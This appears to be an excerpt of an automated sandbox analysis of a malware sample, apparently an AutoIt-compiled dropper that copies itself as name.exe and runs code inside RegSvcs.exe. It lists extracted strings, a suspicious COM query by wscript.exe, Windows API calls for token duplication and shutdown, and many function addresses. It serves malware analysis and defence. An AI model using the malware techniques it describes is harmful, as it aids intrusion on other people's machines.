Source: name.exe.0.dr	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_d1731f20-b

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\PsBygexGwH.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\PsBygexGwH.exe

Code function: 0_2_0018D5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_0018D5EB

Source: C:\Users\user\Desktop\PsBygexGwH.exe

Code function: 0_2_00181201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00181201

Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_0018E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		0_2_0018E8F6
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_0032E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		6_2_0032E8F6

Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_00192046	0_2_00192046
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_00128060	0_2_00128060
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_00188298	0_2_00188298
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_0015E4FF	0_2_0015E4FF
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_0015676B	0_2_0015676B
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_001B4873	0_2_001B4873
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_0014CAA0	0_2_0014CAA0
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_0012CAF0	0_2_0012CAF0
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_0013CC39	0_2_0013CC39
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_00156DD9	0_2_00156DD9
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_0013B119	0_2_0013B119
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_001291C0	0_2_001291C0
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_00141394	0_2_00141394
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_00141706	0_2_00141706
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_0014781B	0_2_0014781B
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_00127920	0_2_00127920
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_0013997D	0_2_0013997D
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_001419B0	0_2_001419B0
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_00147A4A	0_2_00147A4A
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_00141C77	0_2_00141C77
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_00147CA7	0_2_00147CA7
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_001ABE44	0_2_001ABE44
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_00159EEE	0_2_00159EEE
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_00141F32	0_2_00141F32
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_023C37C0	0_2_023C37C0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_002C8060	6_2_002C8060
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00332046	6_2_00332046
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00328298	6_2_00328298
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_002FE4FF	6_2_002FE4FF
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_002F676B	6_2_002F676B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00354873	6_2_00354873
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_002ECAA0	6_2_002ECAA0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_002CCAF0	6_2_002CCAF0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_002DCC39	6_2_002DCC39
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_002F6DD9	6_2_002F6DD9
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_002DD065	6_2_002DD065
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_002C90BC	6_2_002C90BC
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_002DB119	6_2_002DB119
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_002C91C0	6_2_002C91C0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_002E1394	6_2_002E1394
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_002E1706	6_2_002E1706
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_002E781B	6_2_002E781B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_002C7920	6_2_002C7920
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_002D997D	6_2_002D997D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_002E19B0	6_2_002E19B0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_002E7A4A	6_2_002E7A4A
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_002E1C77	6_2_002E1C77
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_002E7CA7	6_2_002E7CA7
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00313CD5	6_2_00313CD5
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_0034BE44	6_2_0034BE44
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_002F9EEE	6_2_002F9EEE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_002E1F32	6_2_002E1F32
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_002CBF40	6_2_002CBF40
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_039037C0	6_2_039037C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_008EC1F0	7_2_008EC1F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_008E6168	7_2_008E6168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_008EB388	7_2_008EB388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_008EC4D0	7_2_008EC4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_008EC7B2	7_2_008EC7B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_008E98B8	7_2_008E98B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_008E68E0	7_2_008E68E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_008ECA92	7_2_008ECA92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_008EFA10	7_2_008EFA10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_008E4B31	7_2_008E4B31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_008EBC32	7_2_008EBC32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_008EEDF0	7_2_008EEDF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_008EBF10	7_2_008EBF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_008EE300	7_2_008EE300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_008EE310	7_2_008EE310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_008E35CA	7_2_008E35CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_008EB552	7_2_008EB552
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F73688	7_2_04F73688
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F7C8B8	7_2_04F7C8B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F78278	7_2_04F78278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F77BA8	7_2_04F77BA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F704A0	7_2_04F704A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F70490	7_2_04F70490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F7C460	7_2_04F7C460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F7C450	7_2_04F7C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F7F428	7_2_04F7F428
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F7F418	7_2_04F7F418
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F7D5C0	7_2_04F7D5C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F7D5B0	7_2_04F7D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F70D60	7_2_04F70D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F70D50	7_2_04F70D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F7CD10	7_2_04F7CD10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F7CD02	7_2_04F7CD02
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F7DE70	7_2_04F7DE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F73678	7_2_04F73678
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F7DE61	7_2_04F7DE61
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F7BFF8	7_2_04F7BFF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F7EFD0	7_2_04F7EFD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F7EFC1	7_2_04F7EFC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F7B758	7_2_04F7B758
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F7B748	7_2_04F7B748
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F7E720	7_2_04F7E720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F7E710	7_2_04F7E710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F708F1	7_2_04F708F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F7C8A8	7_2_04F7C8A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F7F880	7_2_04F7F880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F7F871	7_2_04F7F871
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F70040	7_2_04F70040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F7001F	7_2_04F7001F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F7C008	7_2_04F7C008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F7D168	7_2_04F7D168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F7D158	7_2_04F7D158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F70900	7_2_04F70900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F7B2EF	7_2_04F7B2EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F7E2C8	7_2_04F7E2C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F7E2B8	7_2_04F7E2B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F7DA18	7_2_04F7DA18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F77200	7_2_04F77200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F7DA09	7_2_04F7DA09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F7BBB0	7_2_04F7BBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F7BBA0	7_2_04F7BBA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F7EB78	7_2_04F7EB78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F7EB68	7_2_04F7EB68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F7B300	7_2_04F7B300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06058608	7_2_06058608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0605AA58	7_2_0605AA58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0605D670	7_2_0605D670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0605B6E8	7_2_0605B6E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06058B58	7_2_06058B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0605C388	7_2_0605C388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0605A408	7_2_0605A408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0605D028	7_2_0605D028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0605B0A0	7_2_0605B0A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0605BD38	7_2_0605BD38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_060511A0	7_2_060511A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0605C9D8	7_2_0605C9D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06058602	7_2_06058602
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0605560A	7_2_0605560A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06055618	7_2_06055618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0605AA48	7_2_0605AA48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06055A60	7_2_06055A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0605D662	7_2_0605D662
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06055A70	7_2_06055A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06055EB8	7_2_06055EB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06055EC8	7_2_06055EC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0605B6D8	7_2_0605B6D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06056312	7_2_06056312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06056320	7_2_06056320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06053730	7_2_06053730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06056768	7_2_06056768
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06056778	7_2_06056778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0605C378	7_2_0605C378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_060533A8	7_2_060533A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_060533B8	7_2_060533B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06056BC1	7_2_06056BC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06056BD0	7_2_06056BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0605A3FA	7_2_0605A3FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06052807	7_2_06052807
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06050006	7_2_06050006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06052818	7_2_06052818
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0605D018	7_2_0605D018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06054430	7_2_06054430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06050040	7_2_06050040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06057049	7_2_06057049
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06057050	7_2_06057050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06050488	7_2_06050488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06057497	7_2_06057497
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0605B090	7_2_0605B090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06050498	7_2_06050498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_060574A8	7_2_060574A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_060508E0	7_2_060508E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_060508F0	7_2_060508F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_060578F0	7_2_060578F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06057900	7_2_06057900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0605BD28	7_2_0605BD28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06050D39	7_2_06050D39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06050D48	7_2_06050D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06057D48	7_2_06057D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06057D58	7_2_06057D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0605518A	7_2_0605518A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06051191	7_2_06051191
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06055198	7_2_06055198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_060581A0	7_2_060581A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_060581B0	7_2_060581B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0605C9C8	7_2_0605C9C8
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 9_2_03D437C0	9_2_03D437C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00AFC1F0	10_2_00AFC1F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00AF6168	10_2_00AF6168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00AFC4D3	10_2_00AFC4D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00AFB500	10_2_00AFB500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00AFC7B1	10_2_00AFC7B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00AF6790	10_2_00AF6790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00AF98B8	10_2_00AF98B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00AFCA91	10_2_00AFCA91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00AFFA10	10_2_00AFFA10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00AF4B31	10_2_00AF4B31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00AFEDF0	10_2_00AFEDF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00AFBF10	10_2_00AFBF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00AFE300	10_2_00AFE300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00AFE310	10_2_00AFE310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00AF35C8	10_2_00AF35C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06378608	10_2_06378608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0637D670	10_2_0637D670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0637AA58	10_2_0637AA58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0637B6E8	10_2_0637B6E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0637C388	10_2_0637C388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0637D028	10_2_0637D028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0637A408	10_2_0637A408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06378C51	10_2_06378C51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0637B0A0	10_2_0637B0A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0637BD38	10_2_0637BD38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_063711A0	10_2_063711A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0637C9D8	10_2_0637C9D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06375618	10_2_06375618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0637560A	10_2_0637560A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06375A70	10_2_06375A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0637D663	10_2_0637D663
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06375A60	10_2_06375A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0637AA48	10_2_0637AA48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06375EB8	10_2_06375EB8
